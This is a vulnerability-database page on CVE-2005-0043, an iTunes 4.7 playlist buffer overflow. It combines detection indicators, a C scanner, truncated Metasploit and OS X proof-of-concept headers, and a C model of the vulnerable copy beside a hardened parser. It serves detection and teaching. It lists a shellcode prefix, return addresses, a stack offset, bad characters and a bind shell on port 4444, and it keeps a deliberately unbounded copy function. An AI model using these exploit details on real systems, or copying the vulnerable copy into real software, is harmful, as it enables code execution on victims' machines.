CVE-2005-0043
Published 2005-05-02

CVE-2005-0043: Buffer overflow in Apple iTunes 4.7 allows remote attackers to execute arbitrary code via a long URL in (1) .m3u or (2) .pls playlist files.

Priority: P3 (48), severity high; CVSS 2.0 base score 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: available (Exploit-DB and Metasploit entries below)
EPSS: 69.01% (99.3rd percentile)
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | itunes | 4.7 (build 4.7.0.42) | — |
Detection & IOCs (extracted from sources)
Byte pattern (PowerPC shellcode prefix): \x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x07\xfa\x38\xa5\xf8\x4a\x3c\xc0\xee\x83\x60\xc6\xb7\xfb\x38\x85\x07\xee
- Detect PLS playlist files delivered over HTTP whose File1= field holds an abnormally long URL (more than 1598 bytes, the buffer size used by the OS X PoC); that length is the overflow trigger.
- Flag HTTP responses with Content-Type text/plain that serve .pls content containing a [playlist] header, a NumberOfEntries field and an oversized File1=http:// URL.
- Monitor the iTunes process for a new listening socket on TCP port 4444 right after it opens a .pls file: the OS X PoC binds a shell there, so the indicator is an inbound listener (and connections to it), not an outbound connection from iTunes.
- Payload bad characters for this exploit are \x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40; shellcode carried in a .pls URL will avoid these bytes, which helps tune signatures (a very long URL with none of '/', '?', '&' or ':' after the scheme is itself unusual).
- Detect NOP sleds of roughly 2545 bytes prepended to shellcode inside the URL of a .pls entry.
- The OS X PoC pads the buffer with \x60 bytes; scanning .pls content for long runs of \x60 followed by shellcode is a workable detection approach.
- The Metasploit module requires URIPATH to end in .pls; without that extension iTunes does not parse the served file as a playlist.
- The Windows return addresses in the module are version-specific: 0x75033083 targets Windows 2000 Pro SP4 and 0x77dc2063 targets Windows XP Pro SP2; the wrong target crashes iTunes instead of executing code.
- The OS X PoC targets iTunes on OS X 10.3.7 and uses a hardcoded stack offset of 0x3DA8; other builds may need a different offset.
- The vulnerable build is 4.7.0.42; other builds may not be exploitable with these exact offsets.
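The indicators above applied in code. This is an added example written for this page, not code from the CVE entry, the Metasploit module or the OS X PoC: the 1598-byte threshold and the bad-character list come from the indicators, while PAD_RUN_MIN, the function names and the sample playlists are assumptions constructed for the demonstration.

```c
/* Added example for this page (not from the CVE entry, the Metasploit module or
 * the OS X PoC): applies the indicators above to a .pls body.  The 1598-byte
 * threshold and the bad-char list come from the sources quoted above; the
 * 0x60 run length (PAD_RUN_MIN) and the sample playlists are assumptions
 * constructed for the demonstration. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define URL_THRESHOLD 1598   /* BUFSIZE of the OS X PoC: anything longer overruns */
#define PAD_RUN_MIN   64     /* assumed: a run of 0x60 this long is not a real URL */

/* bad chars the Metasploit module lists for this exploit */
static const unsigned char BADCHARS[] = { 0x00, 0x09, 0x0a, 0x0d, 0x20, 0x22, 0x25, 0x26,
                                          0x27, 0x2b, 0x2f, 0x3a, 0x3c, 0x3e, 0x3f, 0x40 };

struct pls_verdict {
    int    has_header;             /* "[playlist]" present */
    int    has_entries;            /* "NumberOfEntries=" present */
    size_t file1_len;              /* bytes in the File1= value (0 if absent) */
    size_t longest_pad_run;        /* longest run of 0x60 inside that value */
    int    sled_like;              /* that run is at least PAD_RUN_MIN */
    size_t badchars_after_scheme;  /* bad chars after "http://": real URLs have some */
    int    suspicious;             /* 1 if the overflow indicators match */
};

static int is_badchar(unsigned char c) {
    for (size_t i = 0; i < sizeof BADCHARS; i++)
        if (BADCHARS[i] == c) return 1;
    return 0;
}

/* length-delimited substring search (memmem is not portable) */
static const char *find(const char *hay, size_t hlen, const char *needle) {
    size_t nlen = strlen(needle);
    for (size_t i = 0; nlen && i + nlen <= hlen; i++)
        if (memcmp(hay + i, needle, nlen) == 0) return hay + i;
    return NULL;
}

/* Scan a .pls body of len bytes; fills *v and returns v->suspicious. */
int scan_pls(const char *body, size_t len, struct pls_verdict *v) {
    memset(v, 0, sizeof *v);
    v->has_header  = find(body, len, "[playlist]") != NULL;
    v->has_entries = find(body, len, "NumberOfEntries=") != NULL;

    const char *f = find(body, len, "File1=");
    if (f) {
        const char *val = f + 6, *end = val, *stop = body + len;
        while (end < stop && *end != '\r' && *end != '\n') end++;
        v->file1_len = (size_t)(end - val);

        size_t run = 0;                                 /* 0x60 padding, as in the OS X PoC */
        for (const char *p = val; p < end; p++) {
            run = ((unsigned char)*p == 0x60) ? run + 1 : 0;
            if (run > v->longest_pad_run) v->longest_pad_run = run;
        }
        v->sled_like = v->longest_pad_run >= PAD_RUN_MIN;

        const char *payload = val;                      /* skip the scheme: its ':' and '/' */
        if (v->file1_len >= 7 && memcmp(val, "http://", 7) == 0) payload = val + 7;
        for (const char *p = payload; p < end; p++)
            if (is_badchar((unsigned char)*p)) v->badchars_after_scheme++;
    }

    /* the length is the primary trigger; the other fields are for the analyst */
    v->suspicious = v->has_header && v->file1_len > URL_THRESHOLD;
    return v->suspicious;
}

/* Constructed benign sample (not captured traffic). */
const char BENIGN_PLS[] =
    "[playlist]\r\nNumberOfEntries=1\r\n"
    "File1=http://example.org/stream?id=1\r\nTitle1=Example\r\nVersion=2\r\n";

/* Build a constructed .pls whose File1 URL is "http://" plus pad_len bytes of 0x60. */
size_t build_sample(char *out, size_t cap, size_t pad_len) {
    const char *head = "[playlist]\r\nNumberOfEntries=1\r\nFile1=http://";
    const char *tail = "\r\nTitle1=demo\r\nVersion=2\r\n";
    size_t hl = strlen(head), tl = strlen(tail);
    if (hl + pad_len + tl >= cap) return 0;
    memcpy(out, head, hl);
    memset(out + hl, 0x60, pad_len);
    memcpy(out + hl + pad_len, tail, tl);
    return hl + pad_len + tl;
}

struct pls_verdict scan_str(const char *s) {
    struct pls_verdict v;
    scan_pls(s, strlen(s), &v);
    return v;
}

struct pls_verdict scan_sample(size_t pad_len) {
    static char buf[16384];
    struct pls_verdict v;
    size_t n = build_sample(buf, sizeof buf, pad_len);
    scan_pls(buf, n, &v);
    return v;
}

int main(void) {
    struct pls_verdict v = scan_sample(2545);            /* the module's sled size */
    printf("File1 length %zu, 0x60 run %zu, bad chars after scheme %zu -> %s\n",
           v.file1_len, v.longest_pad_run, v.badchars_after_scheme,
           v.suspicious ? "SUSPICIOUS" : "benign");
    return 0;
}
```

scan_sample(2545) mirrors the module's sled length and trips the length rule; BENIGN_PLS shows why the bad-char census is worth keeping alongside it: an ordinary URL carries '/' and '?', bytes the payload cannot contain, so a long File1 value with a zero count is the stronger signal.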
No detection rules found.
Exploit-DB
Apple iTunes 4.7 - Playlist Buffer Overflow (Metasploit)
exploitdb · 2010-05-09
---
##
# $Id: apple_itunes_playlist.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

# The extraction dropped everything between "class Metasploit3 <" and the
# first "=>"; the standard module preamble is restored here.
class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Apple ITunes 4.7 Playlist Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Apple ITunes 4.7
				build 4.7.0.42. By creating a URL link to a malicious PLS
				file, a remote attacker could overflow a buffer and execute
				arbitrary code. When using this module, be sure to set the
				URIPATH with an extension of '.pls'.
			},
			'License'        => MSF_LICE
Exploit-DB
Apple iTunes - Playlist Parsing Local Buffer Overflow
exploitdb · 2005-01-16
---
/*
* PoC for iTunes on OS X 10.3.7
* -( [email protected] )-
*
* Generates a .pls file, when loaded in iTunes it
* binds a shell to port 4444.
* Shellcode contains no \x00 or \x0a's.
*
* sample output:
*
* -[nemo@gir:~]$ ./fm-eyetewnz foo.pls
* -( fm-eyetewnz )-
* -( [email protected] )-
* Creating file: foo.pls.
* Bindshell on port: 4444
* -[nemo@gir:~]$ open foo.pls
* -[nemo@gir:~]$ nc localhost 4444
* id
* uid=501(nemo) gid=501(nemo) groups=501(nemo)
*
* Thanks to andrewg, mercy and core.
* Greetings to pulltheplug and felinemenace.
*
* -( need a challenge? )-
* -( http://pulltheplug.org )-
*/
#include <stdio.h>
#include <string.h>
#define BUFSIZE 1598 + 4 /* 1598-byte buffer plus the 4 bytes that follow it */
char shellcode[] = /* large ugly shellcode generated by http://metasploit.com */
"
Metasploit
Apple ITunes 4.7 Playlist Buffer Overflow
metasploit
This module exploits a stack buffer overflow in Apple ITunes 4.7 build 4.7.0.42. By creating a URL link to a malicious PLS file, a remote attacker could overflow a buffer and execute arbitrary code. When using this module, be sure to set the URIPATH with an extension of '.pls'.
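The pattern behind that description, as an added example written for this page (it is not iTunes code and not from either PoC): a model of an unbounded copy of the File1= value into a 1598-byte stack buffer, with the 4 bytes after it standing in for the saved return address (BUFSIZE 1598 + 4 in the OS X PoC), beside the hardened copy and a small playlist parser built on it. The struct layout, sentinel value, function names and sample playlists are assumptions made for the demonstration.

```c
/* Added example written for this page: not iTunes code and not from either PoC.
 * It models the defect the page describes beside a hardened parser.  The
 * 1598-byte buffer and the 4 bytes after it mirror BUFSIZE (1598 + 4) in the
 * OS X PoC; the layout, sentinel, names and sample playlists are assumptions. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define URL_BUF 1598

/* Frame model: URL buffer directly followed by the saved return address (byte
   array, alignment 1, so there is no padding and the overrun is deterministic). */
struct frame {
    char          url[URL_BUF];
    unsigned char saved_ret[4];                      /* the "+ 4" in the PoC's BUFSIZE */
};

/* VULNERABLE (illustration only): copies the value up to end-of-line with no
   bound, then returns what saved_ret holds.  Exactly URL_BUF + 4 bytes overwrite
   it completely; longer input would leave the struct, so never feed it untrusted data. */
uint32_t copy_url_vulnerable(struct frame *f, const char *value) {
    const volatile unsigned char *r = f->saved_ret;  /* volatile: read back for real */
    memcpy(f->saved_ret, "\x41\x41\x41\x41", 4);    /* sentinel "return address" */
    char *volatile dst = f->url;                     /* opaque pointer: nothing checks it */
    size_t i = 0;
    for (; value[i] && value[i] != '\r' && value[i] != '\n'; i++)
        dst[i] = value[i];                           /* i >= 1598 lands on saved_ret */
    if (i < URL_BUF) dst[i] = '\0';
    return ((uint32_t)r[0] << 24) | ((uint32_t)r[1] << 16) | ((uint32_t)r[2] << 8) | r[3];
}

/* HARDENED: measure first, reject what cannot fit with its NUL, and never
   truncate silently (a truncated URL is a different bug). */
int copy_url_hardened(char *dst, size_t cap, const char *value) {
    size_t n = strcspn(value, "\r\n");               /* value ends at end-of-line */
    if (cap == 0 || n >= cap) {                      /* needs n + 1 bytes */
        if (cap) dst[0] = '\0';
        return -1;
    }
    memcpy(dst, value, n);
    dst[n] = '\0';
    return 0;
}

/* Hardened mini-parser for [playlist] bodies: returns the accepted FileN= count,
   -1 if the body is not a playlist; *rejected counts values that were too long. */
int parse_pls(const char *body, char urls[][URL_BUF], int max, int *rejected) {
    int accepted = 0;
    *rejected = 0;
    if (strncmp(body, "[playlist]", 10) != 0) return -1;
    for (const char *line = body; *line; ) {
        size_t len = strcspn(line, "\r\n");
        const char *eq = memchr(line, '=', len);
        if (strncmp(line, "File", 4) == 0 && eq && accepted < max) {
            if (copy_url_hardened(urls[accepted], URL_BUF, eq + 1) == 0) accepted++;
            else (*rejected)++;
        }
        line += len;
        while (*line == '\r' || *line == '\n') line++;
    }
    return accepted;
}

/* ---- constructed demo inputs (not captured data) ---- */
char scratch[URL_BUF];                               /* destination for hardened copies */
const char *a_run(size_t n) {                        /* n bytes of 'A', NUL-terminated */
    static char s[URL_BUF + 64];
    if (n >= sizeof s) n = sizeof s - 1;
    memset(s, 'A', n);
    s[n] = '\0';
    return s;
}

uint32_t demo_overflow(void) {                       /* 1598 x 'A' then "BBBB" */
    static struct frame f;
    static char value[URL_BUF + 5];
    memset(value, 'A', URL_BUF);
    memcpy(value + URL_BUF, "BBBB", 5);              /* copies the NUL too */
    return copy_url_vulnerable(&f, value);           /* 0x42424242 */
}

struct parse_result { int accepted, rejected; };
struct parse_result demo_parse(void) {               /* one sane entry, one oversize */
    static char body[4096], urls[4][URL_BUF];
    const char *head = "[playlist]\r\nNumberOfEntries=2\r\nFile1=http://example.org/a.mp3\r\nTitle1=a\r\nFile2=http://";
    size_t hl = strlen(head);
    struct parse_result r;
    memcpy(body, head, hl);
    memset(body + hl, 0x60, URL_BUF + 4);            /* PoC-sized 0x60 filler */
    strcpy(body + hl + URL_BUF + 4, "\r\nVersion=2\r\n");
    r.accepted = parse_pls(body, urls, 4, &r.rejected);
    return r;
}

int main(void) {
    struct parse_result r = demo_parse();
    printf("vulnerable copy: saved_ret = 0x%08x\n", (unsigned)demo_overflow());
    printf("hardened parser: %d accepted, %d rejected\n", r.accepted, r.rejected);
    return 0;
}
```

The hardened copy rejects rather than truncates: a 1597-byte value fits with its terminator, a 1598-byte value does not, and the parser reports the rejection so a server-supplied playlist with an oversized entry is visible instead of being silently clipped to something that parses.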
No writeups or analysis indexed.
References
- http://lists.apple.com/archives/security-announce/2005/Jan/msg00000.html
- http://secunia.com/advisories/13804
- http://securitytracker.com/id?1012839
- http://www.idefense.com/application/poi/display?id=180&type=vulnerabilities
- http://www.kb.cert.org/vuls/id/377368
- http://www.osvdb.org/12833
- http://www.securityfocus.com/bid/12238
- https://exchange.xforce.ibmcloud.com/vulnerabilities/18851